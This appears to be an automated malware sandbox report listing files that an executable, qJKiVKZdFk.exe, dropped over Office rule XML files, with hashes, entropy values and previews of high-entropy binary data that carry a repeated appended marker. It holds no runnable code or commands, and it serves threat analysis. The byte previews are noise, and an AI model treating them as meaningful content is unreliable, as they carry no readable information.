                                                                                                                                      SSDEEP:24:/lKY12f4Bj4n3+xz9i/tPd6IFvb7xlq7JUbD:/lnqMjY+/25oIxbG7wD
                                                                                                                                      MD5:A1F518F6CDF5AF72DDB7E8D53639421C
                                                                                                                                      SHA1:51D727F57C8D3EB59B4B801D152DB22A3D66D1EE
                                                                                                                                      SHA-256:5CA33E8CA7AD3F6F15DB931B1524C4215EF1DF229987E95786142FF8F3F9A264
                                                                                                                                      SHA-512:C18AF5716E1BF9DBCF67EA741AA7CA0655E3E22D54F00F0B18BE437185D126B0F3F2543C4DD59CABEB0F406F616C99417E5768617E265C799F92A780E77DAF99
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml1.....FE.j^..}g+..-..`.....:b.0.rR....Z7..i.iU...h.b.?i.....i..M....o......H.....PON..V.&.p....2.)2#{.o.n..n.@.[.:..S...9q..{Q.(^S1x...-._c../....)kD..C.i.\..a.l$.^$..^F....zK..rk5...Zb$.E.p.y........A.&..Lp.$fVB^}~R...es.x.c-.H...u.K...5....3.....i....E.I.GIy&.!."......m.E......B..ke.%r..#...W.{.>)c.s{.. ..,S.M.-......>..|.8....<....%I...}+..*V.l..'RM|w7.I.m!Cl.'./..m.-..H.x._...n.F[..N,...!..V..tl..T.*..".......;....C.=]Z....^D.S'.%.....lKw.......T.=... .e..T.B.......~.Zw.X.i.."..W|;o.f.A.q.....n;.!I.k:.C..#.E..l{..Wf^...1..D.K.F.=,..j.nhZ.z..T..kG.,..Y.,T..8}...H.....v..U.....l....V..s!6kaUe...QK.%V+f....,J..{b...Y........'...Hi..m..o]..$U\c.qOX..7.X..#y6o..!....X%..|.=.(..x.W..u..r.F.^s.6.+U......^*...f.n5.......\...}u..9.'.X.<>]......!A..}gV...~&..w...\bl..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320021v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):860
                                                                                                                                      Entropy (8bit):7.725589446696313
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:DFFb6qp7Qvl2HXk2KB3xuWNIpiBAu9G8JbD:DFFb5i4DK8piBAgG8pD
                                                                                                                                      MD5:DF0D18459EF559D3E428343454C948FA
                                                                                                                                      SHA1:19C4F346F1DFF0B0A9A9B0FE79A45DA8B43A5138
                                                                                                                                      SHA-256:85C07AF2C61B7BBA2CC8BC5DFAAA8250BED0FDD12EE1FAA2A0D34D1502E5DE41
                                                                                                                                      SHA-512:7C9A8F69041ECBB21C93FFCF1FEDF7E695F6E24AA5662346BB4A64FE74F8998DBC06D6D9B515610B7619BB91C406B1F7F83EC9477A01512B4663598B9E68B3EA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..l7...X.r .3f......^_.Pc$..he8.....H7c.5.......:....(V...l4C.x.._...L.?.f..6..L+.,..z.n..L..@..F.......4j...f.....He..(!#..eC%....~.Le.s..4.....Qe.k...A..9.A.T.e....]<:M.&t.'."JHv...V..9$.-B[>w%..^.z@...fi..M....4.d..n.*..!.=4..!R..E.:...v2.p8(...6'c.W'..y'..s~gY]s+....-.i.6....)k#....N.2...G..,..vJ....3v,..;&.+~C....3t\.S..w!..n...@...`i=.e.....Ux|R...!.r.M..k,l..Q.@.H..f.........wG....%...w.,...O._,....j.w.......5.9..|._..?..8.-rS..j_..o..H.B6Pxy...a.L.....'s._.......U...+j.!.ZS<.../=m.b..8..._a&=...s.y..P ._D..Q8.\wN.5....w....V...w7...:..Rl.&......;c.m%.4.(."5>...:.QOyqk."W.Y.+....yK..T....L....n.p......k/.hp...p..c...@ . ..L.c.n6.F^.v<I..o..D....6b.(.....@......!....Opqr!{..i..J.>.-.f......_..a..y.M....2..=..#.-...H..B.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320022v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):760
                                                                                                                                      Entropy (8bit):7.692887186410631
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:VwEc7WcRGRxO+M3kXfOyBdVGSdvZ3tF1I1iuendCD63Arh7OxURerQilsZOukIcq:dsWrRxROkXmyvVZ3fKenpooSRerA7bD
                                                                                                                                      MD5:0293873018FAFD3F06B5DDEEB489C802
                                                                                                                                      SHA1:9BFAE6FD9F8D2FC37BB8A27B1B1FBF16D637DFF2
                                                                                                                                      SHA-256:329FA0D53DFBA75F89E312341463AA0786267A71B3D8CFCF3278AEEF471351D2
                                                                                                                                      SHA-512:B5EAD08AAEE8465AE50633A5BEE4C0D21D72E9641B5B1853C8B00655F9BD786545E4BB32D3ABDCFCA51425DB8446C398155D94F86CACB9D51F2A0FA0B3FF1D7E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml....z..E.5I....)b.T..?...%I.j..?F@W*pY..p...N@.Ms.z..|.I......L4=...0X.".X..b......S...xG=e.a`.MY'............M.....?J..@.[..0.2.E.8...g..z....\..++.......g.HpJ9...H....#.&&h......;.e.hBj.$..Z..}...m..t...xa/... 7....&>.i..`o}.@.....a..5E.Z..F.....C...Y.L|\.k..J.K.vE...X.g...R.O.H.M.BJ.(_..m3.V.R.......i..$.S.$~.}.#Y...f.`.m.-.d.....gN.j.....0%. g...E0L......w...>.....=.-..!.........6..V....e.A..S...R....T-.<.)..G....B....u...)..Th.k..w.fD.\..q.t.D=.q.....>gU....O.....VB..O.r6...a(..N2#>...]............p...zPx....x.}.|..R.,.l3r6[...M)....VNN.CtRJ..*..>X.a..Q..st..>..g..ab......X..>..!u.7C..J..t...#.(l....X...*...........'....)..P.k.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320029v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1117
                                                                                                                                      Entropy (8bit):7.837706226045427
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:Ghz+gVdd6bnPxXaHlZcg6L0sK7Ib2QLzIENz4WODkgP47JJJbD:6ddwhylte0j7A2QLzIENz3APAD
                                                                                                                                      MD5:848EE10B6C6704E5946F4C1F89C2EC81
                                                                                                                                      SHA1:9CCF11FB8C8510E3BCA9327B7F524DBC52DAADD3
                                                                                                                                      SHA-256:65F6F8AA5BF12923318315C455F5D05E91A25C782B7CB9B36D647DAB7755ECC4
                                                                                                                                      SHA-512:68471C68E7E758A9EB682D793E57ACED05A55CEA3D27EB6747D7A73CC2E5387B3F323D5A993A50C0900A5728692200A83651228E1D084DE1EE58ECF6CB30F277
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.....U.....4.3..*.(..E.G.|F}.t..>.b..h.{._...|.lO)2..x0..4f1....... ../....H.q.vl...L....?...G...1B.h"b.7b...t.'.....%.P.g."W....L...K.!.q...B...c..Ih.8..|C+&.%.C...K2qx..d..\g..&%.m..Z.-.T.."../^....|..j.O.&..A~S...+R.. .h.b.......Z...s53eh...y.[t.:..FN..".:.;a......KD.....Q.._......I.....|.....H.NU..........$...$....p.dMl..h..h.rs.|.6EQ..9....5..H..kmm...r..R..:J.Nn..n5[d..e1....j .)`.2..W.i..L#s..\D...<....}.91.t'..........U.1.....L...p.\k...S.........}....>......[......jF.e.$-..H.... ....M.i.K..<.e.F^......b.,.m...g...wcyIQ.{...r.>.Wj.C)...3.e;.r..n..}\........Wvrl5f.@....;..]..33. ]..4..Po.".....0m..5.A6[.z..W....|.9&._.J.*.j...?...9._.mC^z..\.)..SUx..b..@........1f..Y*W....4V.{...r.]Q..!.......s..9KG._|...*.;O.e......Gl@.. .....7.$.......u..&..G..R.F.z--I.3..H7.H.}....}..8...t.}.T.'z....~5}=k\...9.A.....%..a..;...(...{.V.{....|0a..D...=.K.{..$R]....=.....d.17..A......I..]5.`d$..2.}.7'...N......h.g.?C>9c.q.Zq.j....f.i.(.."..KM.J

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320032v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1025
                                                                                                                                      Entropy (8bit):7.796085526320914
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:+HkjxPM4/fdMZHYtvqbzWRTrIeqRZeRJAA6q54xGKMbD:Hielh8WRT8e6OJx6c7D
                                                                                                                                      MD5:482860022C3FA726A69A6C3B37F023BC
                                                                                                                                      SHA1:009D92E7156BDDCD682DE643D7663DFDBD3869BA
                                                                                                                                      SHA-256:4BD75E1F7E31DC0CE654499DD3D7B484E0A88446512363F5F32E3E88D8945F13
                                                                                                                                      SHA-512:ECB368BA15CC8757E0B9AC045D670BF78B404565059D25A678F02141A1536DF40F712905E2020E0100724AF5A5D3468D8BA5CA85697AD36B6F7B17967CFFAA93
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlt.,.^7\....S.....0.R.f..h..J..!i}.^..9...2.....$..f.t.5IlKf.....(..!4..C...,.o&..!......D..O..)V.^Q..S...&Y3..j.7..To.xi.?~.-..T.5x.........$.G?O.d5..es6T(D.8a .....{.M.....{..W....U~.T.n.F....|Y.3.o...\.?4..;..p...F......C+M.c.j..2.+8[L!.0../.7.C.f.Q`..b;..7..9..9..5.88..U..:.v.K'3...U8.%.:R.j....a.6r.T?..R....|...v......6....tzf..Z58fsw..h.xLf....r..F..c.}....6.....Kh....{l..X.X.M.[..$.j~....7....{..)T|..W.t=..x${5O.E^...3.Y)..".-UU..."..$.Q>..+.l.4H...;.....W=..np-P.i.>....*.x...>...n.-.....C)...r.K..P..B..dO..~..~...x.gg...&........ ...xr./..1..3..yy..l.2..G.....b..!jf.Mp..~..-. ....N.(..J.....H-2....7..3....a..9.m...z./MM./.:.'^Z.c......9..x.\.1. ]...}../]H{.x}.&}....&..Jo..L.I..`.vs..8S.m.....:.Fq.;.$.LZ.C1.=....p/O:..X...A...^"7..v..l.Yp..Y..l..I..".......$./..#.!_.p.:.P.. .B^.u.s"2D'....|..u%N.../..Q...^...p..d..].Qr.7;.w..ec..At..k.7h?..R...jrh.F..4.}@.~.]}iF..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320033v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1112
                                                                                                                                      Entropy (8bit):7.791863145552515
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:xu/JItLwEVEJA4DivYir7/IAKPc3qhYmHE0BB8gLbD:xu/JItZ0aYM/IAKnY8BxvD
                                                                                                                                      MD5:4D5B42A244F1E72E841BAC10A656F786
                                                                                                                                      SHA1:D571B0F979C87867F7403B3EEF2F1B4C5285F31E
                                                                                                                                      SHA-256:F263308DD9F7F798D40AFD9D2D0E89905F1DE2945E4DDE1490990B50593CE565
                                                                                                                                      SHA-512:9D57D59A7CEEFDAC39E13CD8684E8D4600E9AABC239A42F3A9FC5BE42929B15014776430B7EFD73FED1BE5BEF06F5DD82EC3D5F97D09EE8B05E0C062410A8C51
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml`.......O%.....M..t......b=,0.Z........5..P...-St..U..y.*..%xgQ...u;M..*..!.-{d;.uNKI.#V..<.CxZ...?.>Lj...,A.......q^.2...G...?.qw......h\....J...o..n..=<.....n-~.4...a2.|(....K.G.^.??..........b....fW...7...?....X.....L.rI.d.P..(0~..4....@v.+;.....&w..>..c..r.[.-M.... =.@.%..;......H....".fP...b.m..*......X...ye']..W4d2.....yV6..e....@1....N0\W.jU....p..-.....s.{.]...%Os...L....S.y..6...B.P.....4M...>n.oE...N.^.#Q.rbg.%..dVZ..Y..2.E.F........F._{.B.f..Q.........f..|!.2........K.bN...*.T*#..3;....4..0.<.S.8Q....4W.t.N...%...c.x)5.I....e.m...U.H...=....O.%.O..qb$...PU..2.;^3eY...yB.J=..[.9~^(.h...b...x..%.\(..oQz.Gv..[...+...cdg.".......xAJ.D.p..Y.T<.........v9....I..8..z...$......<.?...|9I9..'.r(..v.m..."2R.w...^.......H.}....D...^#Q;s...;..y.....e.....HN....)........f..=.>..9..B.......g..m..y.G......Cx<......%.....Y....}..&..&.....n.......m..E{./.5..KsmBy.,..R..o.&..Q......F....~....]....Dj"x8....,vN....0..7.b.v]....6.V ..

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320034v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):923
                                                                                                                                      Entropy (8bit):7.758227927472199
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:pDfZDPd7TL2ms7POY9e1LHPeNcEsK5sI0qZ2yXR7fEuM7bD:NB7d73L4XaveNcEX5vpnh7fEuM/D
                                                                                                                                      MD5:782BB4A77E0B9005541B8532746639AB
                                                                                                                                      SHA1:989F3900C6A144CB9C3D4357D4A0DDF5AB9EA8FE
                                                                                                                                      SHA-256:05C3B6E26A58F97ADE1004949F7AE3145F28D7012A388B683BBF8118AF532EEB
                                                                                                                                      SHA-512:7930AD262AF9C3DC7068C2AC7AD761860919D27C0AEDF070B7AE9CCCC2894F8DC460DAE67F638398ACACDB63426615B6536D5B0976442E1531D979A25A610E50
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.;p....)W...b.k........9A..v........9o...fcbJ.D}CN...?.X..Z..%9...V.......2&8X.p.........w1.d .i2|..y..I...Z.Go..@..Ror..@F<k.yU.aM.k..y-?..].....*.].(.r....S^...L.....@@su+....E.A!..?h.Rm.PI..<d.0A.N.. M........<[E?....g.....Z6.2.....!xC.0.......D...w_...Qe.M..v.....N3.}.k6..}.u\.@./...m.4gV..J... ..........~!E..#....#.....f(...U*..*..R6...[.jVO.k8...*^.g...iQ.).~....=.)1...2.......z.8..v..NU...4......{..(.C......v....E.b8.e....u...LT.F.....^.=[8.n3.....Ld...^.....M."H...@!.5i..j:.I<81....T@LU.PKRd..z&.[.0.O^.%.C.,&9.h..@.L,..u.z.....G.[.}8.....:%*m.~........@..<....:X0..B.jB4L...{.%.<.P......2..l..Zd..f.9.WB..D]...Y....d6.y]\....O...\E..o.C~..\c..aP......7^@.ML.[k................B.D1h.q.j...E.S.1:Gu...c..F<vQo...f..h.ZJ..t..7...yf...u.QL...}..5`.lv.U...|..o:...G.+G.e...oXs\....tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320035v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1413
                                                                                                                                      Entropy (8bit):7.86767174644045
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:z1ezF6je9dakwukUcm30CtxZNWkmjkgUJ4sAR14KqXH4xyJbD:BeZddzB0Cr26415qX0uD
                                                                                                                                      MD5:8CFAF211D01453ACC5A462F292CEDEEA
                                                                                                                                      SHA1:866477B09D0A85381D056EFF409129A56D13EA99
                                                                                                                                      SHA-256:7518E9E7DA1DEBB324C1A5E0D3A6C505708F51BF012D0AF05903BA1819E8728E
                                                                                                                                      SHA-512:96A1BBEF09110F08693D9D255D0581F1BAF162B4ED6FE6BD53316E3CD21590F263B1F6E678E647744DB857DBACB5CD425C37F9171A182FCA053DD5F142C150AD
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml!V...X...+.@dn.b.[QlM.k.......bYh._IXW.B.f..T.YQ..V.m..35W....'......Z.R.&H...&S...f.....J....{4..0-..|.R:.L....M..Zl..~s.~_E.;..Zq....C....t!]A.M_^.c.~.2.1G:.(qF..V.9.9|.<... H..F..0g%..f...F...9.......J35...-}.....*`v.....9......4.JY...3B=.....3gc.l9..y....}.{1.0....U.....El...].W.m8.Z?.. U.h..].3...01jb-5....l.@\=.{.H#.v...a./....a...t.9...R...^...O,:1t.K..w.....M<.sf..T.PM..E.......dI.[......#_..'.,.E4.h...hozb5<.AO.n.2....Qdm.......%h..1.c......i.......BV...L.B.!<.~s..{...]....K.X`.D..oJ...7X^Hl+...e.R.].....I.......V....[-.:............h...~ ..E.Cn.l......#.*./..R.k.u.....R-.]K.!.&}%:....p...&.9%..)..K.b.\.qob.Oc....d.l.n...S.....o.........+.....[w[.7.|e...SN..6x.b.O...%.>9..".....q..mu.....gW...2Z..J.Q./8G.1.]....}.6...~.C.....l6tu?..obR....h..X..m.X....7B.....o>.)....yE8^.."YD...#..u....dD..7..C.....z..o...X.H].ME..H..2.5.b..m.."..\.&...:.....XT/.s.j#).\I?.@A...y.<t.f.g0....7.d$...2..lR.uwm.'.B...z......2X.q......

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule322001v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1000
                                                                                                                                      Entropy (8bit):7.747521370752492
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:wQlYuoiUOgBztaA9Xg+KeDxkarCM8aLBVRUNrQvbbD:JCuox7BUYw/mVRVRokvfD
                                                                                                                                      MD5:82A99066400DAEA9DAEC7694BE4706F2
                                                                                                                                      SHA1:8DAAD623536F9AF0A3824140A500E11B1C08E50C
                                                                                                                                      SHA-256:D3F9DD62744CA7FEF4DF452AAEC97A77C45A4D4F9CCFAEF6F78D539CB9F075BE
                                                                                                                                      SHA-512:7C13F87C6787D3DACD48366DF0DB7CA2FBC08FAFFCB38BCA6B3354421F4131968388429CF84DB2713726A0AAA15A81E31960D686F36E9E5F3CFA58522C5EDD18
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.....R^.&...=Js.J2g.i.''|y.......:9..a9..".{..9q.Q-Fc..]..i...;u[E..|2.......4..{<..}...g.p..K...1..s.E,B.N..kFFY.. ...mH...8....=_"xe..._..0..!.rG"..,1.7$.{hF..7.lH^z......J..... ..NN4..!&.....2.L..-!........J...F.@.S/B.s.U..m....`.5V..p....&..N...8.p.qU.O.f..LZ..z.z=5........'.J.".e.^..!.....w..;....2.+..{VdhQ.f".mj.~...O.-.@.......$u...3....*..B.....K...Z...|..;Pu...e...ym........%3...FL.N ....~...2....i..x..7...=.$7.6!...4=&.!h....ab..,s.<.F.i...I/4....U.:.......Q.g....yT.y0).w..MA.K.|......Y..7s..o..VwL..{.....t.=.c...se5'$b9H.C.a\E...6:U'b.W....:..5pe.5QV.Y./2.Az.*.....|G9..r.}.........]..K.X.../..f..j....oB...k0!...%u...v1.<:.....Ky..B>q.....Ed.Q@i.n.....#.}.l,....b&....P....e.+dZI._Cj8.^.......=S...\.L......U...s... <.f.e.Y*.."...gG.?..`.c.{K......QDT........I_.{..f_[...5.^....G>@.....J...oN.c8..f.z.&...`.....N~......Y.i...W..1...[.P.te@B..;.......A.B+&....b.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule322004v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1133
                                                                                                                                      Entropy (8bit):7.833152370160252
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:OhHnhcFrtLbu7G4bYnqPrcHIKDQlkR6Csb7U/Znv3VxSd4+edE/9JbfMbD:OhBcFxX+bBPrcfDQ1nU/RfWQ6/rb+D
                                                                                                                                      MD5:55C03065D17E65E7D0F3101C349908B0
                                                                                                                                      SHA1:64A91DD25E6D9D89560F26E07253AD4858E59A2D
                                                                                                                                      SHA-256:1682F67BC08AF90DC50866880618302B105E5924CBDDD1FC11642A1B9DDB8F60
                                                                                                                                      SHA-512:4C9E67E3A4F6F9C4C74F0668811D1BDB10168024C28F4C6CF9E172FA33BED82A7F4D8465AB9A2CA7F17D0CFDC245D9F6CB48FE33A50B0B00ECC4A30CB5B29221
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.g>..N\.]w..U..3T.....u.?....o.!....7.{H.d=..cu,1 ....=~J..I..W..n...{.z..0...j`U...o.qq%tb......B......E....b.lr.M.......p[."*.........@f...J.q..)..~2.7.{.ov.........'.&)..r.q.>..;...G........O.....L.....&.....jf...u....(....u......dP..Vg).............!.b.)0..y....i..?).h.,.......svU..+.4..+f..m%.........7.{.*X:@S.1.<..&^.r...u. (_....E.3..h...jYz..X.._...B<.}Q.|....!.F.;...ti..K..?.7*..8.'.;...~.........lw?..@...#.n...X.K.(.qJ...G.BX.....g/z.o..Zrb..L..]...M..z&CoU...yr......W....-...b8...<......I.u...Y.$.{.y.=.J./.=M.....O....>..E.....?.*..U9,....;..p..../..H,k.c.?].6.".>...(Vx7...s.......#n....}v....Z('^3.....k..8.........J....v.......MWx....SH...i.[X.:5..4i=..66..w..)...6...o..IE..{.*...v.:U..2..-...X)~S......Lh=F..3..$UE;.i.".c.z...S......R<..,....V.W..D...:w...>,E..i...".BA.|........p.{.V...#...,.f1..a..+.2.u.l:."..Y......-.`(>.f..B^=..~..,3..x.K..t.S.."..R}'.A.82.........q....X.....S..I{.uwU+..N8.......-.w.g...u........_M..K

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule322006v5.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1692
                                                                                                                                      Entropy (8bit):7.900087522010739
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:z8o+lTyTbfucVmzR4NRj2rWN01mLCIC0AGLn7D2/1D:QoAyuNkcKNimLY0C
                                                                                                                                      MD5:A376ABAEBA49F4E409A583810B153DA3
                                                                                                                                      SHA1:87C5DBB8E139EADCCC8A1380861EFB6BBF9F0C07
                                                                                                                                      SHA-256:BF5209136FC494F8FC884A2550F913B144E5842006AD7B30DB9798F2A1707B32
                                                                                                                                      SHA-512:B4302B86350F4CC5642A6F0352038EF016C24D40A1FDEF8BE1D4E903578395480D051C0481EA1BB070D1F37AFA609B9A5ECBA504847EA035B27D49863F1A7F08
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml!.....=:..S....7..#tZ+E.3..S.k...2.......>.*.....Z.6..#..`fy...e...r...........D..k......0..5.YX^....s&QJ.k&.J.2V.....J....Gz._.Y.."i|.'.$........&H.]^L.7..}.e.....=6C....&.<D....C.l!.D.U`...B.Il.m.S.8..e...R.|.........|..:A.6.o5]U...k.3.....XoC.I.....fz6..\.@......;....Q...3?....A{.o...#........w:...y }........8.#f...G..........8.d...W...8.%x.B..lA.F,.6...N..$.w$.W5..G."!......W...H....G"kJ. drpK&gL....u..b.....-...|&(.\J[0.%.>...<Ms.....f.L.{.....2N.U..A.(.9)<.;6..8.t..o$G..7..F.'O........../.l.......!.k...M.j...... ....2.X.hZ.?.)?H\.......h..d*my.`....[...k.....v..Q.c..>.UUF.(..u.I..X..*.>.K......n,...g.o.x...R...vH..LV!A.Y..y-..#.}#.i...~`...A...9..j.W......v....4r...9.J.t..J;-KvJ..B....j....7#%..y.\...:Al....1.%.*....lp..m.gH.J...n..P"3#..N.~.....Q..H..5b...JY.W._..,....R.W.a.%....y..-...41:G.m...Oe..P......\.<..j7.....W=Q..e.._....r.....W.......h.[:...p.Bu..YvhZ..l...Q.5R....y&G...S...n..p..m...!.}...S............

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324001v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):846
                                                                                                                                      Entropy (8bit):7.693390083088428
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:+edH/hA40fyyXVEKoJLghniSca6h4XO+x3k+uOLNB2rWC2bfhklecAzPukIcii9a:1H/hvmyyX2nghiScf+/LB2K/GleIbD
                                                                                                                                      MD5:190F032B62B566B1BCD13DA6D4F4492D
                                                                                                                                      SHA1:D9C27705BAAF4FF42AF3AE851A502E949C392D5B
                                                                                                                                      SHA-256:17264DECC93365BB1A0BE568796826C0283B01BD89D7C4B60456190D91C9B16C
                                                                                                                                      SHA-512:09E1B19EBF11558954707E2ECC4F2140669A90EE973C9947D2D7ACF213AA0F4822FA6D53815B9556E397A2B39D3E8F5EF5049B5CB5A31918772BDA7FA9FDE937
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.k..0.......".....g9x.@.8&...-5.....#C..4....e....g.400.."....DU.......;.....L..j...8'C...k~.2.4..UeQ..d.n...4....&.!.`JhJ...*|._u.a.'..........j..jC...."}...k.RDS..A..X.Z6..V.>...g'.NA...+31..z..`3+...=..ig+..%y.....LJ..c.....&{.3.75.j9.d.s2).y...7.S..9.(P..!......+b.^....R..jL8!*t.F:F.U..4Jg..F..k.R.~/1E:.....r....L.W.Y....O.Z<...Ou.o.M...wY.......]....m.CV`.,.\l.tCC,.*....6.[ti)vmcPI.....Br4H.(ex..2../C.6.'....W..s.".:.9.....w....*.?R$I.....v.F.+?...=t...5q....t..5.e:,{vy...D.......7d-z..t6..lA.2..O.....Wj8..h.jY.jZz.Z.mn..TT..>..XF.D.Ro......[..J.?....{.o+7%.I....Z...S.X.o.........j.../..DRu<'3|1v.,F.../F.a..|..7q6.+....&JK..M.x%\...*.].g.`...T.j(..3I.F..4K^AB..........f....E{...q...?-M$......k....@..E......tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324002v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1197
                                                                                                                                      Entropy (8bit):7.813672756828546
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:qrAk/xJuylKbcQNwO1OTyh06QWQ0eZQsGMdrcC50FDIyyl6Raph/PvJbD:GxJhlKYQmTyvm0e/GMdrcCOlpRmhXvpD
                                                                                                                                      MD5:EB2A561590E5F04C19A68B004A747297
                                                                                                                                      SHA1:AE16CE5F70D5FD3CF1CE10D7E803B6AEC1DEC626
                                                                                                                                      SHA-256:2921006947D2F4530F09134CC58B18AEA31E2B31F42240C1FB09B64367A74BAD
                                                                                                                                      SHA-512:9F8C14D7572F6DED3C75F293AA716B5D9CDF8D1F3F0842A831585498EB843E37543CAE3CC4738460F78891B3F0ACD0BD2E51B21DAB7D8E0EB542D4C00147960D
                                                                                                                                      Malicious:false
